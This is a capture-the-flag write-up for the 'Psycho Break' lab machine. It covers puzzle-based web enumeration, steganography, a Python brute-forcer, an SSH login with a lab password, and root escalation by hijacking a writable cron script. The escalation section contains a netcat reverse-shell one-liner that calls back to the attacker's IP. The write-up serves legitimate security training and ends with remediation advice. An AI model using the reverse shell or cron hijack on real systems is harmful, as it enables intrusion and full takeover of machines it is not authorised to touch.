Target IP: psychobreak.thm (Requires /etc/hosts entry)
Difficulty: Medium
Objective: User (joseph) & Root (root.txt) Flags
1. Executive Summary
“Psycho Break” is a Linux machine themed around a mental hospital. Initial access is a multi-stage puzzle involving web enumeration to find cipher keys, OSINT to locate physical locations (St. Augustine Lighthouse), and audio steganography (Morse code). Credentials for SSH are recovered by brute-forcing a custom Python locking script using a provided dictionary. Privilege escalation is achieved by exploiting a user-writable Python script executed by a system Cron Job.
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap and Web directory fuzzing.
- T1027 (Obfuscated Files or Information): Decoding Atbash, Morse Code, and hidden Zip archives.
- T1110 (Brute Force): Scripting a custom brute-forcer for a Python checker.
- T1053 (Scheduled Task/Job): Exploiting a Python cron job for Root RCE.
2. Operational Setup
Host Configuration
echo "10.10.x.x psychobreak.thm" | sudo tee -a /etc/hosts3. Enumeration
A. Network Scanning
Your scan revealed standard ports:
- 21/tcp (FTP): ProFTPD 1.3.5a.
- 22/tcp (SSH): OpenSSH.
- 80/tcp (HTTP): Apache.
B. Web Enumeration (The Puzzle)
- Source Code: Viewing the source of the main page revealed
/sadistRoom.
- Key Found:
532219a04ab7a02b56faafbec1a4c1ea.
- Locker Room: Using the key to access
/lockerRoom.
- Cipher:
Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv - Decoding: This is Atbash (A=Z, B=Y).
- Result:
Grant_me_access_to_the_map_please.
- The Map: Accessing the map reveals
/SafeHeavenand/abandonedRoom.
C. OSINT (The Keeper)
Fuzzing /SafeHeaven revealed /keeper.
- Challenge: “Where is the Lighthouse?”
- Clue: The image or text likely referenced The Evil Within lore or visual cues.
- Solution: St. Augustine Lighthouse.
- Keeper Key:
48ee41458eb0b43bf82b986cecf3af01.
4. Initial Access: The Media Hunt
A. FTP & Morse Code
Using the keys found, you accessed the FTP server.
- File:
key.wav. - Analysis: The audio contains Morse Code.
- Tool: Morse Code Adaptive Decoder.
- Result: A password (likely used for the Zip file later).
B. Steganography (The “Table”)
You downloaded helpme.zip and extracted Table.jpg.
- Forensics:
file Table.jpgreveals it is actually a Zip archive (Zip headersPKdetected).
mv Table.jpg Table.zip
unzip Table.zip- Contents:
Joseph_Oda.jpgandkey.wav(again).
C. The Brute Force (Dictionary & Checker)
You mentioned a “dictionary and checker file.” This is the pivotal step.
- Files: Typically
random.py(the lock) anddict.txt(the keys). - Goal: The script checks if a password is correct. You wrote a wrapper to try every word in
dict.txtagainst the python script.
Python Brute-Forcer Logic:
import subprocess
with open("dict.txt", "r") as f:
for line in f:
password = line.strip()
# Run the checker script with the password
try:
output = subprocess.check_output(["python3", "program.py", password], stderr=subprocess.STDOUT)
if b"Success" in output: # Or whatever success message it gives
print(f"Found Password: {password}")
break
except:
continueD. SSH Login
Using the password recovered from the brute force (or the thankyou.txt found inside the Stego image Joseph_Oda.jpg using that password):
- User:
joseph - Password:
intotheterror445
ssh joseph@psychobreak.thmUser Flag: Found in joseph’s home directory.
5. Privilege Escalation: Cron Job
A. Enumeration
We check for running processes or scheduled tasks.
crontab -l
# or
cat /etc/crontabFinding: A cron job runs a Python script (likely the_plan.py or similar) as root regularly.
B. The Vulnerability
We check permissions on the script.
ls -la /path/to/script.py
# -rw-rw-r-- 1 root joseph ... script.pyCritical Flaw: The user joseph has Write access to the file. We can overwrite it with malicious code.
C. Exploitation (Python Reverse Shell)
We overwrite the script with the payload you used.
echo 'import os; os.system("mkfifo /tmp/f; nc 10.10.YOUR.IP 4444 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f")' > script.pyD. Execution
- Start listener:
nc -lvnp 4444. - Wait for the cron job to trigger.
- Root Shell.
Root Flag: /root/root.txt.
6. Remediation (Blue Team)
- File Extensions: Ensure file validation checks the actual file headers (Magic Bytes), not just the extension.
Table.jpgbeing a Zip file should be detected. - Information Leakage:
- Remove source code comments revealing hidden paths (
/sadistRoom). - Do not hide credentials in audio files or images; this is “Security by Obscurity.”
- Cron Job Permissions:
- Scripts executed by root must be writable only by root.
- Fix:
chown root:root script.pyandchmod 700 script.py.